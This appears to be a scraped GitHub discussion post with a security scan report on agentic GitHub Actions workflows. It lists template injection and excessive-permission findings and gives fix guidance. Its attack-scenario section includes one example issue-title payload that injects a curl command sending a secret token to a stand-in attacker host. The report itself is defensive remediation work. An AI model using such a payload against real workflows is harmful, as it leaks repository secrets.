You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The most critical finding is template injection vulnerabilities affecting 4 workflows, which could allow command injection attacks through user-controlled input.
Full Analysis Report
Analysis Summary
Tools Used
zizmor v1.16.3 - GitHub Actions security scanner
poutine v1.0.4 - Supply chain security analyzer
actionlint - GitHub Actions workflow linter
Scan Coverage
Total Workflows Scanned: 94
Compiled Workflows: 94 (.lock.yml files)
Workflows with Issues: 5 (5.3%)
Clean Workflows: 89 (94.7%)
Findings by Tool
🔴 Zizmor Security Findings
Issue Type
Severity
Count
Affected Workflows
template-injection
High
6
4 workflows
excessive-permissions
High
4
1 workflow
Total: 10 High severity findings
Template Injection Details
Description: Code injection via template expansion
Confidence: High
Impact: Attackers can inject arbitrary commands through GitHub context variables
Affected Workflows:
changeset.lock.yml
close-old-discussions.lock.yml
mcp-inspector.lock.yml
release-highlights.lock.yml
Reference: (redacted)#template-injection
Excessive Permissions Details
Description: Overly broad permissions granted to workflow
Confidence: High
Impact: Broader attack surface if workflow is compromised
Affected Workflows:
test-assign-to-agent.lock.yml
Reference: (redacted)#excessive-permissions
🟢 Poutine Supply Chain Findings
Result: No supply chain vulnerabilities detected ✅
Poutine analyzed the repository for:
Confused deputy attacks
Untrusted code execution
Unverified script execution
Known vulnerabilities in dependencies
Debug mode enabled
Pull requests on self-hosted runners
Conclusion: The workflows follow secure supply chain practices.
🟡 Actionlint Code Quality Findings
Issue Type
Count
Affected Workflows
shellcheck
3
release-highlights.lock.yml
syntax-check
1
cloclo.lock.yml
Total: 4 issues
Shellcheck Issues
Type: SC2086 - Variables should be double-quoted to prevent word splitting
Location: release-highlights.lock.yml
Instances: 3 occurrences on lines 422 (offsets 17:36, 28:31, 33:48)
Impact: Low - potential for unexpected behavior with spaces in variable values
Syntax Check Issue
Type: Invalid YAML key
Location: cloclo.lock.yml:337
Message: unexpected key "names" for "issues" section
Impact: Low - workflow may not trigger as expected
Why This Matters:
Template injection is a critical security vulnerability that can lead to:
Arbitrary command execution
Secret exfiltration
Repository compromise
Privilege escalation
Attack Scenario:
An attacker could create an issue with a malicious title like:
"; curl attacker.com?secret=$SECRET_TOKEN #
If a workflow interpolates ${{ github.event.issue.title }} directly into a shell command, this would execute the attacker's curl command and leak secrets.
Recommendation: Fix immediately
🟠 High Priority: Excessive Permissions (4 findings, 1 workflow)
Why This Matters:
Overly broad permissions violate the principle of least privilege and increase the blast radius of a potential compromise.
Recommendation: Review and restrict permissions to the minimum required
🟡 Medium Priority: Code Quality Issues (4 findings, 2 workflows)
Why This Matters:
While not security-critical, these issues can lead to unexpected behavior and maintenance problems.
Recommendation: Address during regular maintenance
Detailed Fix Guidance
Fix Template: Template Injection
Problem: GitHub context variables directly interpolated into shell scripts
Solution: Always pass context values through environment variables
Impact: Team awareness and capability Effort: Ongoing
Conclusion
This static analysis scan provides a comprehensive security and quality baseline for the agentic workflows repository. The findings are concentrated in a small subset of workflows (5.3%), with template injection being the primary security concern.
reacted with thumbs up emoji reacted with thumbs down emoji reacted with laugh emoji reacted with hooray emoji reacted with confused emoji reacted with heart emoji reacted with rocket emoji reacted with eyes emoji
Uh oh!
There was an error while loading. Please reload this page.
-
Executive Summary
Comprehensive static analysis scan completed on 94 agentic workflows using three industry-standard security tools: zizmor (security scanner), poutine (supply chain security), and actionlint (workflow linter).
Key Findings:
The most critical finding is template injection vulnerabilities affecting 4 workflows, which could allow command injection attacks through user-controlled input.
Full Analysis Report
Analysis Summary
Tools Used
Scan Coverage
Findings by Tool
🔴 Zizmor Security Findings
Total: 10 High severity findings
Template Injection Details
changeset.lock.ymlclose-old-discussions.lock.ymlmcp-inspector.lock.ymlrelease-highlights.lock.ymlExcessive Permissions Details
test-assign-to-agent.lock.yml🟢 Poutine Supply Chain Findings
Result: No supply chain vulnerabilities detected ✅
Poutine analyzed the repository for:
Conclusion: The workflows follow secure supply chain practices.
🟡 Actionlint Code Quality Findings
release-highlights.lock.ymlcloclo.lock.ymlTotal: 4 issues
Shellcheck Issues
release-highlights.lock.ymlSyntax Check Issue
cloclo.lock.yml:337Priority Ranking
🔴 Critical Priority: Template Injection (6 findings, 4 workflows)
Why This Matters:
Template injection is a critical security vulnerability that can lead to:
Attack Scenario:
An attacker could create an issue with a malicious title like:
If a workflow interpolates
${{ github.event.issue.title }}directly into a shell command, this would execute the attacker's curl command and leak secrets.Recommendation: Fix immediately
🟠 High Priority: Excessive Permissions (4 findings, 1 workflow)
Why This Matters:
Overly broad permissions violate the principle of least privilege and increase the blast radius of a potential compromise.
Recommendation: Review and restrict permissions to the minimum required
🟡 Medium Priority: Code Quality Issues (4 findings, 2 workflows)
Why This Matters:
While not security-critical, these issues can lead to unexpected behavior and maintenance problems.
Recommendation: Address during regular maintenance
Detailed Fix Guidance
Fix Template: Template Injection
Problem: GitHub context variables directly interpolated into shell scripts
Solution: Always pass context values through environment variables
Example Fix
Before (Vulnerable):
After (Secure):
Complete Fix Instructions
For each affected workflow (
changeset,close-old-discussions,mcp-inspector,release-highlights):${{ ... }}) inrun:blocksenv:section of the step$VAR_NAMEor${VAR_NAME})Common Patterns:
${{ github.repository_owner }}→env.REPO_OWNER + $REPO_OWNER${{ github.event.repository.name }}→env.REPO_NAME + $REPO_NAME${{ steps.*.outputs.* }}→env.OUTPUT_VALUE + $OUTPUT_VALUE${{ github.actor }}→env.ACTOR + $ACTORWorkflow-Specific Analysis
changeset.lock.yml
push_to_pull_request_branch, Step 3steps.app-token.outputs.tokeninterpolated directlyclose-old-discussions.lock.yml
agent, Step 2github.repository_ownerandgithub.event.repository.namein GraphQL querymcp-inspector.lock.yml
release-highlights.lock.yml
test-assign-to-agent.lock.yml
cloclo.lock.yml
Recommendations
Immediate Actions (This Week)
Fix Template Injection in 4 workflows:
changeset.lock.ymlclose-old-discussions.lock.ymlmcp-inspector.lock.ymlrelease-highlights.lock.ymlImpact: Critical security vulnerability remediation
Effort: ~2-4 hours per workflow
Review Permissions in
test-assign-to-agent.lock.yml:Impact: Reduce attack surface
Effort: ~1 hour
Short-term Actions (This Month)
Fix Code Quality Issues:
release-highlights.lock.ymlcloclo.lock.ymlImpact: Improve maintainability
Effort: ~30 minutes
Establish Automated Scanning:
Impact: Prevent future vulnerabilities
Effort: ~2-4 hours setup
Long-term Actions (Next Quarter)
Update Workflow Creation Guidelines:
Impact: Systematic prevention
Effort: ~1-2 days
Security Training:
Impact: Team awareness and capability
Effort: Ongoing
Conclusion
This static analysis scan provides a comprehensive security and quality baseline for the agentic workflows repository. The findings are concentrated in a small subset of workflows (5.3%), with template injection being the primary security concern.
Positive Findings:
Action Required:
Next Steps:
Scan Metadata:
Beta Was this translation helpful? Give feedback.
All reactions